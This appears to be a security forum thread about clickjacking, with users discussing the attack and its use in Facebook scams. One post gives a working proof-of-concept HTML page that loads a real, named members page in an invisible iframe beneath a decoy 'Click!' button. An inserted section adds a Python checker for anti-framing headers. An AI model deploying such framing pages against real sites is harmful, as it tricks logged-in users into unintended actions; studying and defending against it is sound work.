robertray

clickjacking test page


gcooke

That's an interesting looking exploit. When I'm back in my office tomorrow I may have to point it at one of the sites on my server and I'll post up some results for you to let you know if it works or not. Though I can't say I have heard of clickjacking, what exactly does it do/hurt on the site?

gcooke

Well that is nifty... I have a few clients that my security firm works with, who are venturing much more into online business with the way they receive personal information, that I'll have to try this on.

robertray

Looking forward to hearing about your results.

Armando

Clickjacking is another "feature" of HTML/HTTP that turns into a vuln if abused. (Like CSRF, although completely different.)

It's being used in a lot of Facebook malware and scams nowadays. You know the Like button? ;)

robertray

The use of the Like button and Facebook is sometimes odd. Not always sure what people think it means, they just hit it. Social media opens up a whole new world of access to abuse.

gcooke

The use of the Like button and Facebook is sometimes odd. Not always sure what people think it means, they just hit it. Social media opens up a whole new world of access to abuse.

Yeah, social media is both a blessing and a curse at times. It opens itself up for a lot of harm to be done to people who don't really understand what is going on around them, as well as connecting people across the world.

gcooke

Played around with it some. Clearly my old website was never coded to block this type of attack.

http://mystechconsulting.com/clickjack/clickjack.html

I'm a bit curious about this since I do work with a lot of companies who use websites as a main source of leads and sales. I see how it works as an iframe, but I'm curious what it can do with a pop-up window type set-up, where the contact form pops up in a new window with no address bar to try and be more secure (at least that was the reason a few of my clients gave me for having it done that way): could you still jack it as easily without someone seeing it, or does it have to be embedded in an iframe? I might just play around with this code some over the next few days if I can clear my plate.

Armando

Looks like your tests would be interesting to include in our upcoming web app security project ;)

icic21

Try this simple example... it's only a proof of concept...

1) Login to https://members.elearnsecurity.com/home.php

2) Create this file test.html:

<html>
<head>
<title>Test</title>
<style>
/* Visible decoy text, positioned where the target page's real control sits and drawn underneath the frame */
span.button1{background-color:red;font-weight:bold;font-size:12px;
position:absolute;top:79px;left:1170px;z-index:-10}
/* The framed page is fully transparent but stays on top, so it receives the click */
iframe.test{opacity:0;filter:alpha(opacity=0)}
</style>
</head>
<body>
<br>
<iframe id="test" class="test" width="100%" height="100%" scrolling=no src="https://members.elearnsecurity.com/home.php"></iframe>
<span class="button1"><blink> Click! </blink></span>
</body>
</html>

3) Open test.html and click on "Click!"

It's a stupid example... But I think that you do understand. I don't think it is a real vulnerability.... some say that the nature of the web... (HTML, JavaScript, browsers... etc.)... Or rather it is a vulnerability... but it is the fault of the nature of the WEB if there is...

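gcooke asked above how a site stops this. The defence is a response header that tells the browser who may frame the page: X-Frame-Options, or the CSP frame-ancestors directive. The following Python check is an added example, not code from this thread or from eLearnSecurity; it takes a dict of response headers (the headers and hostnames in the docstrings and test are constructed) and decides whether a given third-party origin would be allowed to embed the page, applying the rule that browsers honour frame-ancestors over X-Frame-Options when both are present.

```python
from urllib.parse import urlsplit

def origin_of(url: str) -> tuple:
    """(scheme, host, port) of a URL, with the default port filled in."""
    p = urlsplit(url)
    port = p.port or {"http": 80, "https": 443}.get(p.scheme)
    return (p.scheme.lower(), (p.hostname or "").lower(), port)

def frame_ancestors(csp: str):
    """Source list of the frame-ancestors directive, or None if the policy has none."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None

def source_matches(src: str, page: tuple, framer: tuple) -> bool:
    """Does one CSP source expression permit `framer` to embed `page`?"""
    if src == "'none'":
        return False
    if src == "'self'":
        return framer == page
    if src == "*":
        return True
    if src.endswith(":"):                      # scheme-source such as https:
        return framer[0] == src[:-1]
    scheme, _, hostport = src.rpartition("://")
    if scheme and scheme != framer[0]:
        return False
    host, _, port = hostport.partition(":")
    if port and port != "*" and int(port) != framer[2]:
        return False
    if host.startswith("*."):                  # matches subdomains, not the bare domain
        return framer[1].endswith(host[1:])
    return host == framer[1]

def framing_verdict(headers: dict, page_url: str, framer_url: str) -> str:
    """'blocked', 'allowed' or 'unprotected' for framer_url embedding page_url (constructed URLs)."""
    h = {k.lower(): v for k, v in headers.items()}
    page, framer = origin_of(page_url), origin_of(framer_url)
    sources = frame_ancestors(h.get("content-security-policy", ""))
    if sources is not None:                    # browsers honour CSP over X-Frame-Options
        return "allowed" if any(source_matches(s, page, framer) for s in sources) else "blocked"
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "blocked"
    if xfo == "SAMEORIGIN":
        return "allowed" if framer == page else "blocked"
    return "unprotected"                       # no header at all: any site may frame the page
```

A page whose headers produce "unprotected" for an arbitrary foreign origin is exactly the case the test.html above relies on; sending `Content-Security-Policy: frame-ancestors 'none'` (with `X-Frame-Options: DENY` for older browsers) turns the verdict into "blocked".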
Armando

That's why you were logging in so many times recently.

We watch you :lol:

icic21

That's why you were logging in so many times recently.

We watch you :lol:

:rolleyes:

...I feel observed... :P

ElearnSecurity Big Brother... :o
